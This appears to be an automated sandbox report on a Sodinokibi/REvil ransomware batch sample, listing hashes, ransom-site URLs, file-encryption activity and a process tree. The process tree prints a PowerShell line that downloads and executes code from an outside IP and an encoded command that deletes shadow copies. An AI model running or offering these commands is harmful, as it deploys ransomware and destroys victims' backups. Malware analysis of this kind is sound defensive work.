Analysis
-
max time kernel
144s -
max time network
147s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
09-08-2020 06:10
Static task
static1
Behavioral task
behavioral1
Sample
0cc92ed976f20bbf302be1a39d209cfb.bat
Resource
win7
Behavioral task
behavioral2
Sample
0cc92ed976f20bbf302be1a39d209cfb.bat
Resource
win10v200722
General
-
Target
0cc92ed976f20bbf302be1a39d209cfb.bat
-
Size
215B
-
MD5
5a017babe92c5caf427346c46b48b015
-
SHA1
2958eaeeb470d273b70d1528c0e78b33de585b8c
-
SHA256
02a0406ce3e4a1076e67011128e0f0ea53e4c1ab7826a25e0215c8418960563e
-
SHA512
8406dd4b30b5f549321ee69c640c3ddb93cdf3213075ddd8f283698129b39a1ae09e08cceea0a508aaa2a600b96f7e491331edd63e8f2309563bebc386ef6ece
Malware Config
Extracted
http://185.103.242.78/pastes/0cc92ed976f20bbf302be1a39d209cfb
Extracted
C:\jl77p-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/183B54E3404D5CCD
http://decryptor.cc/183B54E3404D5CCD
Signatures
-
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\EnterConvertFrom.tiff => \??\c:\users\admin\pictures\EnterConvertFrom.tiff.jl77p powershell.exe File renamed C:\Users\Admin\Pictures\RevokeUse.png => \??\c:\users\admin\pictures\RevokeUse.png.jl77p powershell.exe File renamed C:\Users\Admin\Pictures\SyncInstall.crw => \??\c:\users\admin\pictures\SyncInstall.crw.jl77p powershell.exe File renamed C:\Users\Admin\Pictures\SyncRemove.png => \??\c:\users\admin\pictures\SyncRemove.png.jl77p powershell.exe File renamed C:\Users\Admin\Pictures\SyncRestart.tif => \??\c:\users\admin\pictures\SyncRestart.tif.jl77p powershell.exe File opened for modification \??\c:\users\admin\pictures\EnterConvertFrom.tiff powershell.exe File renamed C:\Users\Admin\Pictures\JoinOut.raw => \??\c:\users\admin\pictures\JoinOut.raw.jl77p powershell.exe File renamed C:\Users\Admin\Pictures\MountSkip.raw => \??\c:\users\admin\pictures\MountSkip.raw.jl77p powershell.exe File renamed C:\Users\Admin\Pictures\RepairAssert.raw => \??\c:\users\admin\pictures\RepairAssert.raw.jl77p powershell.exe File renamed C:\Users\Admin\Pictures\SaveEnter.png => \??\c:\users\admin\pictures\SaveEnter.png.jl77p powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 796 powershell.exe Token: SeDebugPrivilege 796 powershell.exe Token: SeDebugPrivilege 1476 powershell.exe Token: SeBackupPrivilege 764 vssvc.exe Token: SeRestorePrivilege 764 vssvc.exe Token: SeAuditPrivilege 764 vssvc.exe Token: SeTakeOwnershipPrivilege 796 powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepid process 796 powershell.exe 796 powershell.exe 796 powershell.exe 796 powershell.exe 796 powershell.exe 1476 powershell.exe 1476 powershell.exe 1476 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\rak8g7m1k13yk.bmp" powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 496 wrote to memory of 796 496 cmd.exe powershell.exe PID 496 wrote to memory of 796 496 cmd.exe powershell.exe PID 496 wrote to memory of 796 496 cmd.exe powershell.exe PID 796 wrote to memory of 1476 796 powershell.exe powershell.exe PID 796 wrote to memory of 1476 796 powershell.exe powershell.exe PID 796 wrote to memory of 1476 796 powershell.exe powershell.exe -
Blacklisted process makes network request 94 IoCs
Processes:
powershell.exeflow pid process 1 796 powershell.exe 12 796 powershell.exe 13 796 powershell.exe 15 796 powershell.exe 17 796 powershell.exe 19 796 powershell.exe 21 796 powershell.exe 23 796 powershell.exe 25 796 powershell.exe 27 796 powershell.exe 29 796 powershell.exe 31 796 powershell.exe 33 796 powershell.exe 35 796 powershell.exe 37 796 powershell.exe 39 796 powershell.exe 41 796 powershell.exe 43 796 powershell.exe 45 796 powershell.exe 46 796 powershell.exe 49 796 powershell.exe 51 796 powershell.exe 53 796 powershell.exe 55 796 powershell.exe 57 796 powershell.exe 59 796 powershell.exe 61 796 powershell.exe 63 796 powershell.exe 64 796 powershell.exe 67 796 powershell.exe 68 796 powershell.exe 70 796 powershell.exe 72 796 powershell.exe 74 796 powershell.exe 76 796 powershell.exe 78 796 powershell.exe 80 796 powershell.exe 82 796 powershell.exe 84 796 powershell.exe 86 796 powershell.exe 88 796 powershell.exe 90 796 powershell.exe 92 796 powershell.exe 94 796 powershell.exe 96 796 powershell.exe 98 796 powershell.exe 100 796 powershell.exe 102 796 powershell.exe 104 796 powershell.exe 107 796 powershell.exe 109 796 powershell.exe 111 796 powershell.exe 113 796 powershell.exe 115 796 powershell.exe 117 796 powershell.exe 119 796 powershell.exe 121 796 powershell.exe 123 796 powershell.exe 125 796 powershell.exe 127 796 powershell.exe 130 796 powershell.exe 132 796 powershell.exe 134 796 powershell.exe 136 796 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Drops file in Program Files directory 30 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\MergeCompress.wvx powershell.exe File opened for modification \??\c:\program files\RestoreSet.AAC powershell.exe File opened for modification \??\c:\program files\ResumeSwitch.crw powershell.exe File opened for modification \??\c:\program files\ConvertFromConvert.vbs powershell.exe File opened for modification \??\c:\program files\DismountConfirm.ps1xml powershell.exe File opened for modification \??\c:\program files\AssertPing.3gpp powershell.exe File opened for modification \??\c:\program files\ClearTest.mp4v powershell.exe File opened for modification \??\c:\program files\CloseGroup.vsx powershell.exe File opened for modification \??\c:\program files\DisconnectBackup.mpeg powershell.exe File opened for modification \??\c:\program files\ResumeUpdate.snd powershell.exe File opened for modification \??\c:\program files\StopPop.jpeg powershell.exe File created \??\c:\program files (x86)\jl77p-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertFromComplete.htm powershell.exe File opened for modification \??\c:\program files\PopRequest.midi powershell.exe File opened for modification \??\c:\program files\RevokeRestore.cfg powershell.exe File opened for modification \??\c:\program files\WriteStep.mov powershell.exe File created \??\c:\program files\jl77p-readme.txt powershell.exe File opened for modification \??\c:\program files\MoveConvertFrom.mp2 powershell.exe File opened for modification \??\c:\program files\ReadAssert.au3 powershell.exe File opened for modification \??\c:\program files\LockWrite.ram powershell.exe File opened for modification \??\c:\program files\NewImport.xlsb powershell.exe File opened for modification \??\c:\program files\SendSearch.snd powershell.exe File opened for modification \??\c:\program files\SetUninstall.ogg powershell.exe File opened for modification \??\c:\program files\GrantApprove.ram powershell.exe File opened for modification \??\c:\program files\RestoreGroup.html powershell.exe File opened for modification \??\c:\program files\ShowMount.ppsx powershell.exe File opened for modification \??\c:\program files\OpenMerge.docx powershell.exe File opened for modification \??\c:\program files\RenameRedo.au powershell.exe File opened for modification \??\c:\program files\SplitDeny.mov powershell.exe File opened for modification \??\c:\program files\UndoRepair.kix powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0cc92ed976f20bbf302be1a39d209cfb.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:496 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/0cc92ed976f20bbf302be1a39d209cfb');Invoke-JNLSXVWQ;Start-Sleep -s 10000"2⤵
- Modifies extensions of user files
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
- Drops file in Program Files directory
PID:796 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1476
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:764